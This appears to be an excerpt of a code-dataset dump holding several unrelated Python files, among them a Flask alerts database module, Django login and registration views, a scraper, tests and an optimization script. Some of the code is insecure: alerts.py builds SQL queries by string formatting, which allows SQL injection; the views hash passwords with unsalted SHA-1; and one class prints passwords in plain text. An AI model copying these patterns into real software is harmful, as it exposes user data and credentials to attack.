c[\"rst\"] + str(self.__actividad))\r\n if len(self.__clientes) > 1:\r\n x = 1\r\n print(c[\"ly\"] + \"Lista de clientes: \" + c[\"rst\"])\r\n for cliente in self.__clientes:\r\n print(str(x) + \". \" + str(cliente))\r\n x += 1\r\n elif len(self.__clientes) > 0:\r\n print(c[\"ly\"] + \"Cliente: \" + c[\"rst\"] + str(self.__clientes[0]))\r\n else:\r\n print(c[\"lr\"] + \"Actualmente no hay clientes asociados a la actividad.\" + c[\"rst\"])\r\n if len(self.__empleados) > 1:\r\n x = 1\r\n print(c[\"ly\"] + \"Lista de empleados: \" + c[\"rst\"])\r\n for empleado in self.__empleados:\r\n print(str(x) + \". 
\" + str(empleado))\r\n x += 1\r\n elif len(self.__empleados) > 0:\r\n print(c[\"ly\"] + \"Empleado: \" + c[\"rst\"] + str(self.__empleados[0]))\r\n else:\r\n print(c[\"lr\"] + \"Actualmente no hay empleados asociados a la actividad.\" + c[\"rst\"])\r\n\r\n # Getters\r\n def getId(self):\r\n return self.__id\r\n def getActividad(self):\r\n return self.__actividad\r\n def getClientes(self):\r\n return self.__clientes\r\n def getEmpleados(self):\r\n return self.__empleados\r\n\r\n # Setters\r\n def setId(self, id):\r\n self.__id = id\r\n def setActividad(self, actividad):\r\n self.__actividad = actividad\r\n def setClientes(self, clientes):\r\n self.__clientes = clientes\r\n def setEmpleados(self, empleados):\r\n self.__empleados = empleados\r\n\r\n # Añadir a la lista\r\n def addCliente(self, cliente):\r\n self.__clientes.append(cliente)\r\n def addEmpleado(self, empleado):\r\n self.__empleados.append(empleado)\r\n\r\n # Eliminar de la lista\r\n def deleteCliente(self, cliente):\r\n if cliente in self.__clientes:\r\n self.__clientes.remove(cliente)\r\n return True\r\n else:\r\n return False\r\n def deleteEmpleado(self, empleado):\r\n if empleado in self.__empleados:\r\n self.__empleados.remove(empleado)\r\n return True\r\n else:\r\n return False\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Oportunidad():\r\n def __init__(self, nombre=None, informes=None, dinero_estimado=None, tipoetapa=None, id=None):\r\n if nombre is None:\r\n self.nombre = \"Sin nombre\"\r\n else:\r\n self.nombre = nombre\r\n if informes is None:\r\n self.informes = []\r\n else:\r\n self.informes = informes\r\n if dinero_estimado is None:\r\n self.dinero_estimado = 100\r\n else:\r\n self.dinero_estimado = dinero_estimado\r\n if tipoetapa is None:\r\n self.tipoetapa = TipoEtapa.Nueva\r\n else:\r\n self.tipoetapa = tipoetapa\r\n if id is None:\r\n self.id = Fun.generar_id_oportunidad()\r\n else:\r\n self.id = id\r\n\r\n def __str__(self):\r\n return \"{0} ({1}) - Etapa: {2}. 
Dinero estimado: {3}€\".format(str(self.nombre), str(self.id), str(self.tipoetapa.name), str(self.dinero_estimado))\r\n\r\n def addInforme(self, informe):\r\n self.informes.append(informe)\r\n def deleteInforme(self, informe):\r\n if informe in self.informes:\r\n self.informes.remove(informe)\r\n\r\n def mostrar_oportunidad(self):\r\n c = colores()\r\n print(c[\"ly\"] + \"Oportunidad: \" + c[\"rst\"] + str(self.nombre) + \"(\" + str(self.id) + \")\")\r\n if len(self.informes) > 1:\r\n x = 0\r\n print(c[\"ly\"] + \"- Lista de informes: \" + c[\"rst\"], end=\"\")\r\n for informe in self.informes:\r\n if x == 0:\r\n print(str(informe.getId()), end=\"\")\r\n else:\r\n print(\", \" + str(informe.getId()), end=\"\")\r\n x += 1\r\n elif len(self.informes) > 0:\r\n print(c[\"ly\"] + \"- Informe: \" + c[\"rst\"] + str(self.informes[0].getId()), end=\"\")\r\n else:\r\n print(c[\"lr\"] + \"Actualmente no hay informes asociados a la actividad.\" + c[\"rst\"], end=\"\")\r\n print()\r\n print(c[\"ly\"] + \"- Dinero estimado: \" + c[\"rst\"] + str(self.dinero_estimado))\r\n print(c[\"ly\"] + \"- Etapa: \" + c[\"rst\"] + str(self.tipoetapa.name))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass RegistroLesion():\r\n def __init__(self, descripcion=None, nivel_importancia=None, id=None):\r\n if descripcion is None:\r\n self.descripcion = \"Sin descripción\"\r\n else:\r\n self.descripcion = descripcion\r\n if nivel_importancia is None:\r\n self.nivel_importancia = 1\r\n else:\r\n self.nivel_importancia = nivel_importancia # Si el nivel de importancia es 0, es que ya está curada\r\n if id is None:\r\n self.id = Fun.generar_id_registroLesion()\r\n else:\r\n self.id = id\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Venta():\r\n def __init__(self, productos, cliente, empleado, precio_total=None, id=None):\r\n # Los productos deben asignarse antes de poder calcular el precio total\r\n self.productos = productos\r\n self.cliente = cliente\r\n self.empleado = empleado\r\n if id is None:\r\n self.id = Fun.generar_id_venta()\r\n else:\r\n self.id = id\r\n if precio_total is None:\r\n self.precio_total = self.calcularPrecio()\r\n else:\r\n self.precio_total = precio_total\r\n\r\n # Calcula el precio total de la venta en el momento que se realizó (por si los precios cambian)\r\n # (me he planteado guardar el precio del momento de cada producto pero sería demasiado complejo)\r\n def calcularPrecio(self):\r\n precio_total = 0.0\r\n for producto in self.productos:\r\n precio_total += producto.precio\r\n return precio_total\r\n\r\n def __str__(self):\r\n return \"Id: {0}. Precio total: {1}. Cliente: {2}. Vendedor: {3}\".format(str(self.id), str(self.precio_total), str(self.cliente.nombre),\r\n str(self.empleado.nombre))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\n# Nota: esta definición sustituye a la clase Usuario anterior; resuelve el empleado a partir de su id\r\nclass Usuario():\r\n def __init__(self, usuario, contrasenya, empleado):\r\n self.usuario = usuario\r\n self.contrasenya = contrasenya\r\n if type(empleado) is str:\r\n empleados = cd.cargar_datos_empleados()\r\n for emple in empleados:\r\n if emple.id == empleado:\r\n self.empleado = emple\r\n else:\r\n self.empleado = empleado\r\n\r\n def __str__(self):\r\n return \"Usuario: {0}. Contraseña: {1}. 
Empleado asociado: {2}\".format(str(self.usuario), str(self.contrasenya),\r\n str(self.empleado.nombre))\r\n","sub_path":"Practicas/Practica 3 - Departamentos/Departamentos/venv/Archivos/Clases.py","file_name":"Clases.py","file_ext":"py","file_size_in_byte":19227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22601298","text":"from sqlalchemy import exc\r\nfrom . import db\r\n\r\n\r\nclass Alerts(db.Base):\r\n __table__ = db.Base.metadata.tables['alerts']\r\n\r\n\r\ndef check_alerts(sens_id):\r\n try:\r\n with db.engine.connect() as connection:\r\n existing_alerts = []\r\n result = connection.execute(\"select * \"\r\n \"from alerts \"\r\n \"where sensorID = '{}'\"\r\n .format(sens_id))\r\n for row in result:\r\n existing_alerts.append(row)\r\n return existing_alerts\r\n\r\n except exc.SQLAlchemyError:\r\n return False\r\n\r\n\r\ndef add_sensor_alert(acc_id, sens_id, trigger, email_alert, phone_alert):\r\n try:\r\n with db.engine.connect() as connection:\r\n checker = check_alerts(sens_id)\r\n #if len(checker) == 0 or not checker:\r\n connection.execute(\r\n \"insert into alerts (accountID, sensorID, triggerLevel, alertPhone, alertEmail)\"\r\n \"values ({}, '{}', {}, {}, {})\"\r\n .format(acc_id, sens_id, trigger, email_alert, phone_alert))\r\n return True\r\n '''\r\n else:\r\n connection.execute(\r\n \"update alerts \"\r\n \"set alerts.triggerLevel = {}, alerts.alertEmail = {}, alerts.alertPhone = {} \"\r\n \"where alerts.accountID = {} and alerts.sensorID = '{}'\"\r\n .format(trigger, email_alert, phone_alert, acc_id, sens_id))\r\n return True\r\n '''\r\n except exc.SQLAlchemyError as e:\r\n print(\">>>>>>>SQLAlchemy Error : \" + str(e))\r\n return False\r\n\r\n\r\ndef remove_alert(alert_num):\r\n try:\r\n with db.engine.connect() as connection:\r\n connection.execute(\"delete from alerts \"\r\n \"where alertsNum = %s;\", (alert_num,))\r\n return True\r\n except exc.SQLAlchemyError:\r\n return False\r\n\r\n\r\ndef set_alert_type(alert_num, new_email, new_text):\r\n try:\r\n with db.engine.connect() as connection:\r\n\r\n connection.execute(\r\n \"update alerts \"\r\n \"set alertPhone = {}, alertEmail = {} \"\r\n \"where alertsNum = {}\"\r\n .format(new_email, new_text, alert_num))\r\n\r\n return True\r\n\r\n except exc.SQLAlchemyError as e:\r\n print(e)\r\n\r\n return False\r\n","sub_path":"Website_Python_Code/flask_website/dbAPI/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644007142","text":"from django.conf.urls import url\n\n\nurlpatterns = [\n url(r'^$', 'community.views.index', name='index'),\n url(r'^board/$', 'community.views.board', name='board'),\n url(r'^board/new/$', 'community.views.post_new', name='post_new'),\n url(r'^board/(?P\\d+)/$', 'community.views.post_detail', name='post_detail'),\n url(r'^practice/$', 'community.views.practice', name='practice'),\n]\n","sub_path":"community/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"106843302","text":"import json\nimport os\nimport requests\nfrom multiprocessing import Pool, cpu_count\nfrom string import punctuation\nfrom sys import argv\nfrom time import sleep\n\n# self-explanatory\nOUTPUT_PATH = os.getcwd() + '/output/district/'\n\n# number of processors. 
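# A small defensive sketch for the pool-size computation just below:
# `cpu_count() - int(argv[1])` can reach zero or go negative for large argv
# values, and multiprocessing.Pool raises ValueError for sizes below 1.
# The helper name `clamped_pool_size` is hypothetical; it assumes the same
# cpu_count import already used by this script.
def clamped_pool_size(reserved):
    return max(1, cpu_count() - reserved)

# usage sketch: NUM_POOL = clamped_pool_size(int(argv[1]))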
it depends on the number of CPU\nNUM_POOL = cpu_count() - int(argv[1])\n\n# number of retries in case requests timed out\nNUM_RETRY = int(argv[2])\n\n# time interval in case requests timed out\nSLEEP_TIME = int(argv[3])\n\n# timeout duration\nTIMEOUT = int(argv[4])\n\ndef district(semester_id):\n \"\"\"\n Returns data pokok pendidikan at district level.\n\n Argument:\n - semester_id = a combination of year and semester, where year is in YYYY format and semester is either 1 or 2.\n \"\"\"\n \n # open province data \n with open(os.getcwd() + '/output/province/province-20191.json', 'r') as json_file:\n data = json.load(json_file)\n\n # get province code\n province_code = []\n for d in data:\n province_code.append(d.get('kode_wilayah').replace(\" \", \"\"))\n\n # base url which is needed to get each district data\n url = 'http://dapo.dikdasmen.kemdikbud.go.id/rekap/progres?&id_level_wilayah=1&kode_wilayah={}&semester_id={}'\n\n # store URLs into a list\n urls = []\n for i in province_code:\n for j in semester_id:\n urls.append(url.format(i, j))\n \n return urls\n \ndef main(urls):\n \"\"\"\n Returns data pokok pendidikan at district level in JSON format.\n \"\"\"\n\n file_name = urls.translate(str.maketrans('', '', punctuation))\n i = 0\n while i < NUM_RETRY:\n try:\n response = requests.get(urls, timeout = TIMEOUT)\n if response.status_code == 200:\n with open(OUTPUT_PATH + '{}.json'.format(file_name), 'w') as json_file:\n json.dump(response.json(), json_file)\n i = NUM_RETRY\n except Exception:\n sleep(SLEEP_TIME)\n i += 1\n\nif __name__ == \"__main__\":\n\n semester_id = argv[5].split(',')\n # run multiple tasks in parallel\n result = Pool(NUM_POOL).map(main, district(semester_id))","sub_path":"src/district.py","file_name":"district.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"402736114","text":"from test_utils import TestApi\nfrom test_utils.factories import InstanceFactory\n\nfrom app_models.models import Profile\n\nfrom profiles.serializers import ProfileSerializer\n\n\nclass TestProfile(TestApi):\n base_url = '/api/profiles/'\n instance_url_lookup_field = 'user__username'\n model_class = Profile\n serializer_class = ProfileSerializer\n\n def instance_url(self, instance) -> str:\n return '{}{}/'.format(self.base_url, instance.user.username)\n\n @property\n def ref_instance(self):\n return self.red_profile\n\n def setUp(self):\n super().setUp()\n\n self.red_profile = InstanceFactory.create_profile('red')\n self.roy_profile = InstanceFactory.create_profile('stranger')\n\n def test_serialization(self):\n expected = ['username', 'email', 'name', 'created_at']\n\n serializer = self.serializer_class(self.red_profile)\n\n for item in expected:\n self.assertIn(item, serializer.data)\n\n self.assertEqual(len(serializer.data), len(expected))\n\n def test_permissions(self):\n self.anonymous_user_401()\n\n def test_auto_create(self):\n user, _ = InstanceFactory.create_user('auto_create_profile')\n self.model_class.objects.get(user=user)\n\n def test_list(self):\n response = self.list([self.red_profile.user], 200)[self.red_profile.user]\n\n self.assertEqual(len(response.data['results']), 1)\n self.assertEqual(response.data['results'][0], ProfileSerializer(self.roy_profile).data)\n\n for i in range(0, 20):\n InstanceFactory.create_user('u_{}'.format(i))\n for i in range(0, 5):\n friend_user, _ = InstanceFactory.create_user('f_{}'.format(i))\n 
InstanceFactory.create_friendship_two_way(self.red_profile.user, friend_user)\n\n user_count = Profile.objects.all().count()\n self.assertEqual(user_count, 1 + 1 + 20 + 5)\n\n response = self.list([self.red_profile.user], 200)[self.red_profile.user]\n self.assertEqual(len(response.data['results']), 10)\n self.assertEqual(response.data['item_count'], user_count - 1)\n\n def test_create(self):\n users = [self.red_profile.user, self.roy_profile.user]\n self.create(users, 405, {})\n\n def test_retrieve(self):\n users_200 = [self.red_profile.user, self.roy_profile.user]\n responses = self.retrieve(users_200, 200)\n\n self.assertEqual(responses[self.red_profile.user].data, self.serializer_class(self.red_profile).data)\n self.assertEqual(responses[self.roy_profile.user].data, self.serializer_class(self.red_profile).data)\n\n def test_update(self):\n data = self.serializer_class(self.red_profile).data\n data['name'] = 'updated name'\n\n self.update([self.roy_profile.user], 403, {})\n\n self.update([self.red_profile.user], 200, data)\n\n self.assertEqual(Profile.objects.get(user=self.red_profile.user).name, 'updated name')\n\n def test_me(self):\n response = self.client.get(self.base_url + 'me/', content_type=self.content_type)\n self.assertEqual(response.status_code, 401)\n\n self.client.force_authenticate(self.red_profile.user)\n response = self.client.get(self.base_url + 'me/', content_type=self.content_type)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['username'], self.red_profile.user.username)\n","sub_path":"profiles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530703079","text":"import asyncio\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef test_loop():\n old_loop = asyncio.get_event_loop()\n new_loop = asyncio.new_event_loop()\n try:\n asyncio.set_event_loop(new_loop)\n yield new_loop\n finally:\n asyncio.set_event_loop(old_loop)\n new_loop.close()\n","sub_path":"test/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"18382876","text":"from typing import TYPE_CHECKING\n\nfrom dvc.scheme import Schemes\n\nif TYPE_CHECKING:\n from .index import ObjectDBIndexBase\n\n\ndef get_odb(fs, path_info, **config):\n from .base import ObjectDB\n from .gdrive import GDriveObjectDB\n from .local import LocalObjectDB\n from .oss import OSSObjectDB\n\n if fs.scheme == Schemes.LOCAL:\n return LocalObjectDB(fs, path_info, **config)\n\n if fs.scheme == Schemes.GDRIVE:\n return GDriveObjectDB(fs, path_info, **config)\n\n if fs.scheme == Schemes.OSS:\n return OSSObjectDB(fs, path_info, **config)\n\n return ObjectDB(fs, path_info, **config)\n\n\ndef _get_odb(repo, settings):\n from dvc.fs import get_cloud_fs\n\n if not settings:\n return None\n\n cls, config, path_info = get_cloud_fs(repo, **settings)\n config[\"tmp_dir\"] = repo.tmp_dir\n return get_odb(cls(**config), path_info, state=repo.state, **config)\n\n\ndef get_index(odb) -> \"ObjectDBIndexBase\":\n import hashlib\n\n from .index import ObjectDBIndex, ObjectDBIndexNoop\n\n cls = ObjectDBIndex if odb.tmp_dir else ObjectDBIndexNoop\n return cls(\n odb.tmp_dir,\n hashlib.sha256(odb.path_info.url.encode(\"utf-8\")).hexdigest(),\n odb.fs.CHECKSUM_DIR_SUFFIX,\n )\n\n\nclass ODBManager:\n CACHE_DIR = \"cache\"\n CLOUD_SCHEMES = [\n Schemes.S3,\n 
Schemes.GS,\n Schemes.SSH,\n Schemes.HDFS,\n Schemes.WEBHDFS,\n ]\n\n def __init__(self, repo):\n self.repo = repo\n self.config = config = repo.config[\"cache\"]\n self._odb = {}\n\n local = config.get(\"local\")\n\n if local:\n settings = {\"name\": local}\n elif \"dir\" not in config:\n settings = None\n else:\n from dvc.config_schema import LOCAL_COMMON\n\n settings = {\"url\": config[\"dir\"]}\n for opt in LOCAL_COMMON.keys():\n if opt in config:\n settings[str(opt)] = config.get(opt)\n\n self._odb[Schemes.LOCAL] = _get_odb(repo, settings)\n\n def _init_odb(self, schemes):\n for scheme in schemes:\n remote = self.config.get(scheme)\n settings = {\"name\": remote} if remote else None\n self._odb[scheme] = _get_odb(self.repo, settings)\n\n def __getattr__(self, name):\n if name not in self._odb and name in self.CLOUD_SCHEMES:\n self._init_odb([name])\n\n try:\n return self._odb[name]\n except KeyError as exc:\n raise AttributeError from exc\n\n def by_scheme(self):\n self._init_odb(self.CLOUD_SCHEMES)\n yield from self._odb.items()\n","sub_path":"dvc/objects/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"491853482","text":"from django.shortcuts import render\nfrom django.http.response import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom hashlib import sha1\nfrom df_user.models import *\nfrom .islogin import *\nfrom df_goods.models import *\n\n# Create your views here.\ndef register(request):\n context = {'title':'注册'}\n return render(request, 'df_user/register.html', context)\n\t\ndef register_handle(request):\n # 接收用户输入信息\n post = request.POST\n uname = post.get('user_name')\n upwd = post.get('pwd')\n ucpwd = post.get('cpwd')\n uemail = post.get('email')\n #print(uname, upwd, ucpwd, uemail)\n \n # 判断两次输入的密码是否一致\n if upwd != ucpwd:\n return HttpResponseRedirect('/df_user/register')\n \n # 对密码原文进行sha1的加密\n # 创建sha1的对象\n s1 = sha1()\n # 对passswd进行sha1的加密\n #s1.update(passwd) # python2的写法\n s1.update(upwd.encode()) # python3的写法\n upwd2 = s1.hexdigest()\n \n # 创建对象 填入数据 然后插入数据库中\n user = UserInfo()\n user.uname = uname\n user.upwd = upwd2\n user.uemail = uemail\n user.save()\n \n return HttpResponseRedirect('/df_user/login')\n\t\n\t\ndef register_exist(request):\n # 接收用户传入的uname参数\n get = request.GET\n uname = get.get('uname')\n \n # 在数据库中查找是否有该用户名\n count = UserInfo.objects.filter(uname=uname).count()\n return JsonResponse({'count':count})\n\t\ndef login(request):\n\tcontext = {'title':'登入'}\n\treturn render(request, 'df_user/login.html', context)\n\t\ndef login_handle(request):\n # 接收用户输入信息\n post = request.POST\n uname = post.get('username')\n upwd = post.get('pwd')\n jizhu = post.get('jizhu')\n \n # 根据用户名和密码查询数据库\n users = UserInfo.objects.filter(uname = uname)\n if len(users) >= 1:\n #print(users[0].upwd)\n \n # 对密码原文进行sha1的加密\n # 创建sha1的对象\n s1 = sha1()\n #s1.update(passwd) # python2的写法\n s1.update(upwd.encode()) # python3的写法\n upwd2 = s1.hexdigest()\n \n # 和数据库中的密文进行比较\n if upwd2 == users[0].upwd:\n url = request.COOKIES.get('url', '/df_user/info')\n red = HttpResponseRedirect(url) \n \n if jizhu:\n red.set_cookie('uname', uname)\n else:\n red.set_cookie('uname', '')\n\n # 登录成功\n request.session['user_id'] = users[0].id\n request.session['user_name'] = uname\n \n return red\n else:\n # 登录失败,密码错误\n context = {'title':'登录','error_pwd':1,'error_name':0}\n return render(request, 'df_user/login.html', context)\n\n else:\n # 用户名找不到\n context 
= {'title':'登录','error_name':1,'error_pwd':0}\n        return render(request, 'df_user/login.html', context)\n\t\t\n@islogin\t\t\ndef info(request):\n    user_email = UserInfo.objects.get(id = request.session['user_id']).uemail\n    user_address = UserInfo.objects.get(id = request.session['user_id']).uaddress\n    user_phone = UserInfo.objects.get(id = request.session['user_id']).uphone\n\t\n\t # 从cookies中读取最近浏览的信息\n    goods_ids = request.COOKIES.get('goods_ids')\n    if goods_ids and goods_ids != '':\n        goods_ids = goods_ids.split(',')\n    else:\n        goods_ids = []\n    # 遍历goods_ids列表 根据id搜索出每个产品 并添加到产品列表中\n    goods_list = []\n    for id in goods_ids:\n        if id != '':\n            goods = GoodsInfo.objects.get(id=id)\n            goods_list.append(goods)\n\t\n\t\n\t\n\t\n\t\n    context = {'title': '用户中心', \n               'user_name' : request.session['user_name'],\n               'user_email' : user_email,\n               'user_address': user_address,\n               'user_phone': user_phone,\n\t\t\t   'page_name': 1,\n\t\t\t   'info':1,\n\t\t\t   'goods_list':goods_list}\n    return render(request, 'df_user/user_center_info.html',context)\n\t\n@islogin\ndef order(request):\n\tcontext = {'title':'全部订单',\n\t\t\t\t'page_name': 1,\n\t\t\t\t'order':1}\n\treturn render(request,'df_user/user_center_order.html', context)\n\n\t\n@islogin\ndef site(request):\n    user = UserInfo.objects.get(id = request.session['user_id'])\n    if request.method == 'POST':\n        # 当用户通过表单提交信息的时候 request.method=\"POST\" 此时获取提交过来的参数 并保存到数据库中\n        post = request.POST\n        user.ushou = post.get('ushou')\n        user.uaddress = post.get('uaddress')\n        user.uyoubian = post.get('uyoubian')\n        user.uphone = post.get('uphone')\n        user.save()\n    else:\n        # 当用户通过url直接访问df_user/site 的时候 request.method=\"GET\" 此时无需进行任何操作 直接通过模型类获取属性即可\n        pass\n    \n    context = {'title': '用户中心',\n               'ushou' : user.ushou,\n               'uaddress': user.uaddress,\n               'uphone': user.uphone,\n\t\t\t   'page_name': 1,\n               'site': 1}\n    return render(request, 'df_user/user_center_site.html', context)\n\t\ndef logout(request):\n    request.session.flush() # 清理session缓存\n    return HttpResponseRedirect('/df_user/login')\n\n\t\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\n\t","sub_path":"df_user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"505612508","text":"import numpy as np\nfrom numpy.linalg import inv\nfrom numpy.linalg import eigvals\n\nclass NewtonMethod(object):\n    \n\tdef __init__(self, Q, p, A, b):\n\t\tif not self._check_spd(Q):\n\t\t\tprint('The matrix Q is not positive semi-definite!')\n\t\t# the matrix Q should be symmetric\n\t\tself.Q = Q\n\t\tself.p = p\n\t\tself.A = A\n\t\tself.b = b\n\t\n\tdef _back_tracking(self, t, x, dx, alpha = 0.4, beta = 0.8):\n\t\t_t = 1. 
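# Context for the loop below (added comments): this is a backtracking line
# search under the Armijo condition. The method argument `t` is the barrier
# weight, while the local `_t` is the step length. Starting from _t = 1, the
# step _t*dx is accepted once
#     f(x + _t*dx) <= f(x) + alpha * _t * (dx . grad f(x)),
# otherwise _t shrinks to beta * _t. With 0 < alpha < 0.5 and 0 < beta < 1
# this terminates for a descent direction dx; here f is the log-barrier
# objective t * (v'Qv + p'v) - sum(log(b - Av)).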
# initialize the step length to be 1.\n\t\tdf = self._gradient(x, t)\n\t\tfx = self._f(x, t)\n\t\t\n\t\t# update the step function\n\t\txx = x + _t * dx\n\t\t\n\t\twhile(self._f(xx, t) >= fx + alpha * _t * dx @ df):\n\t\t\t_t = beta * _t\n\t\t\txx = x + _t * dx\n\n\t\treturn _t * dx\n \n\tdef _check_spd(self, Q):\n\t\treturn np.all(eigvals(Q) >= 0)\n\t\n\tdef _f (self, v, t):\n\t\t# evaluation function given v and t\n\t\treturn t * (v @ self.Q @ v + self.p @ v) \\\n\t\t\t\t- np.sum(np.log(self.b - self.A @ v))\n \n\tdef evaluate(self, v):\n\t\treturn v @ self.Q @ v + self.p @ v\n \n\tdef _gradient(self, x, t):\n\t\t# compute the gradient of the target function\n\t\treturn 2 * t * self.Q @ x + t * self.p + np.sum(self.A.T / (self.b - self.A @ x), axis=1)\n\t\n\tdef _gradient_second(self, x, t):\n\t\t# compute the second derivative\n\t\tM = self.A.T / (self.b - self.A @ x)\n\t\treturn 2 * t * self.Q + t * M @ M.T\n\t\n\tdef centering_step(self, t, v0, eps):\n\t\tv = v0\n\t\tnorm = np.linalg.norm\n\t\tdf = self._gradient(v, t)\n\t\tH = self._gradient_second(v, t)\n\t\tdx = -inv(H) @ df\n\t\thistory = [v0]\n\t\twhile(- df @ dx / 2 >= eps):\n\t\t\tH = self._gradient_second(v, t)\n\t\t\tdf = self._gradient(v, t)\n\t\t\tdx = -inv(H) @ df\n\t\t\tdx_prime = self._back_tracking(t, v, dx)\n\t\t\tv = v + dx_prime\n\t\t\thistory.append(v)\n\t\treturn v, history\n\t\n\tdef barr_method(self, v0, eps, mu = 10):\n\t\tv = v0\n\t\tm = self.A.shape[0]\n\t\thistory = [v0]\n\t\thistory_all = []\n\t\tt = 1\n\t\twhile(m / t >= eps):\n\t\t\tv, _history = self.centering_step(t, v, 0.01)\n\t\t\tt = mu * t\n\t\t\tprint(self.evaluate(v))\n\t\t\thistory.append(v)\n\t\t\thistory_all.append(_history)\n\t\treturn v, history, history_all\n\nn = 100\nd = 1000\n\nreg = 10\n\ny = np.random.uniform(size = (n))\nX = np.random.uniform(size = (n, d))\n\nQ = np.identity(n) / 2\np = -y\nA = np.vstack([X.T, -X.T])\nb = np.repeat(reg, 2 * d)\n\nqp = NewtonMethod(Q, p, A, b)\nv0 = np.random.uniform(size = (n))\n\nmus = [10, 15, 20, 40, 80, 100]\n\nimport matplotlib.pyplot as plt\n\nfig, ax = plt.subplots()\nfor mu in mus:\n\tv_, h_, h_all = qp.barr_method(v0, 0.00001, mu = mu)\n\thv_ = [qp.evaluate(v) for v in h_]\n\thv_ = hv_ - min(hv_)\n\tax.semilogy(np.arange(len(hv_)), hv_, label = r'$\\mu = $'+str(mu))\nax.legend(loc='upper right')\nax.set_title('Precision Against Iterations')\nax.set_ylabel(r'$f(v_t) - f^*$')\nax.set_xlabel('Iteration')\n\nfig.savefig('visual.pdf')","sub_path":"optim/barrier.py","file_name":"barrier.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"83190596","text":"# Basic version of agents where they select random actions\n\nfrom mesa import Agent\nimport pandas as pd\n\nfrom . 
import AgentConstants\n\n\nclass RandomAgent(Agent):\n def __init__(self, unique_id, model):\n super().__init__(unique_id, model)\n if self.model.privacyPopulation == -1:\n p = self.random.uniform(0, 1)\n if p <= 0.455:\n self.privacyType = AgentConstants.CAUTIOUS\n self.pleasure = 0.1\n self.recognition = 0.2\n self.privacy = 1\n self.security = 0.7\n elif p <= 0.818:\n self.privacyType = AgentConstants.CONSCIENTIOUS\n self.pleasure = 0.4\n self.recognition = 0.6\n self.privacy = 0.5\n self.security = 0.6\n else:\n self.privacyType = AgentConstants.CASUAL\n self.pleasure = 1\n self.recognition = 0.7\n self.privacy = 0\n self.security = 0.3\n elif self.model.privacyPopulation == 0:\n self.privacyType = AgentConstants.CAUTIOUS\n self.pleasure = 0.1\n self.recognition = 0.2\n self.privacy = 1\n self.security = 0.7\n elif self.model.privacyPopulation == 1:\n self.privacyType = AgentConstants.CONSCIENTIOUS\n self.pleasure = 0.4\n self.recognition = 0.6\n self.privacy = 0.5\n self.security = 0.6\n elif self.model.privacyPopulation == 2:\n self.privacyType = AgentConstants.CASUAL\n self.pleasure = 1\n self.recognition = 0.7\n self.privacy = 0\n self.security = 0.3\n self.happy = 0\n self.currentAction = AgentConstants.SHARE_NO\n self.friends = self.model.relationship.adj[unique_id]\n self.currentCompanions = []\n self.reward = 0\n\n\n def step(self):\n self.decision()\n self.move()\n\n # Function for mobility pattern modeling\n\n def move(self):\n x = self.pos\n\n # Might need y later\n newY = 0\n\n p = self.random.uniform(0, 1)\n # Chance of each place is uniform\n if p <= (1 / 9):\n newX = AgentConstants.BEACH\n elif p <= (2 / 9):\n newX = AgentConstants.MUSEUM\n elif p <= (3 / 9):\n newX = AgentConstants.COMPANY\n elif p <= (4 / 9):\n newX = AgentConstants.SURGERY\n elif p <= (5 / 9):\n newX = AgentConstants.EXAM\n elif p <= (6 / 9):\n newX = AgentConstants.COMPETITION\n elif p <= (7 / 9):\n newX = AgentConstants.FUNERAL\n elif p <= (8 / 9):\n newX = AgentConstants.TYPHOON\n else:\n newX = AgentConstants.SPEED_TICKET\n self.model.grid.move_agent(self, (newX, newY))\n\n # Function for the decision making process of the agent\n # At each given location, the agent decides whether or not it wants to share a photo with the public,\n # common friends, or no one.\n def decision(self):\n location = self.pos\n str_location = AgentConstants.map_cords_to_places(location)\n\n actions_values = self.processLocation(str_location)\n\n # Determine which action to take\n # Basic version: add up all the values in each row, and see which one is largest\n no_value = (actions_values.loc[:, 'SHARE_NO']).sum()\n friends_value = (actions_values.loc[:, 'SHARE_FRIENDS']).sum()\n public_value = (actions_values.loc[:, 'SHARE_PUBLIC']).sum()\n\n p = self.random.uniform(0, 1)\n if p <= (1/3):\n best_action = no_value\n elif p <= (2/3):\n best_action = friends_value\n else:\n best_action = public_value\n\n # Set an intermediate currentAction for other agents to see what action you've chosen\n if best_action == no_value:\n self.currentAction = AgentConstants.SHARE_NO\n elif best_action == friends_value:\n self.currentAction = AgentConstants.SHARE_FRIENDS\n elif best_action == public_value:\n self.currentAction = AgentConstants.SHARE_PUBLIC\n\n current_companions = self.updateCompanions()\n\n best_action, reward = self.processCompanions(best_action, current_companions)\n self.reward = reward\n\n # Check if the agent is happy with the action taken\n # best_action is an int from 0 to 40, we determine an agent to be happy if it 
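# A hedged, roughly equivalent sketch of the 1/3-2/3 threshold chain used in
# decision() above: a single uniform draw over the three candidate values.
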